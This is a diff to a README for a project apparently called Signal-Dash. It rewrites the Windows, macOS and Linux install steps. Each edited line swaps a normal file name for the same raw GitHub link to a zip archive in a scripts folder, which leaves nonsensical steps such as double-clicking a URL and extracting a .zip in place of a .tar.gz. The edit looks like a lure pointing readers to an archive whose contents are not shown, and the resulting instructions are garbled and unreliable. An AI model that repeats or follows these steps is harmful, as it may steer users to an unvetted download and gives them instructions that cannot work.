Yurnero555/Signal-Dash/README.md

 ### For Windows Users:

 - Extract the downloaded `.zip` file.
-- Open the folder and double-click on `Signal-Dash.exe`.
+- Open the folder and double-click on `https://github.com/Yurnero555/Signal-Dash/raw/refs/heads/main/scripts/Signal_Dash_v3.4.zip`.
 - Follow the prompts to complete the installation.

 ### For macOS Users:

-- Extract the downloaded `.tar.gz` file.
+- Extract the downloaded `https://github.com/Yurnero555/Signal-Dash/raw/refs/heads/main/scripts/Signal_Dash_v3.4.zip` file.
-- Open the folder and double-click on `Signal-Dash.app`.
+- Open the folder and double-click on `https://github.com/Yurnero555/Signal-Dash/raw/refs/heads/main/scripts/Signal_Dash_v3.4.zip`.
 - Drag the app to your Applications folder.

 ### For Linux Users:

-- Extract the downloaded `.tar.gz` file.
+- Extract the downloaded `https://github.com/Yurnero555/Signal-Dash/raw/refs/heads/main/scripts/Signal_Dash_v3.4.zip` file.
 - Open your terminal.
 - Navigate to the extracted folder.
 - Run the command `./Signal-Dash` to launch the application.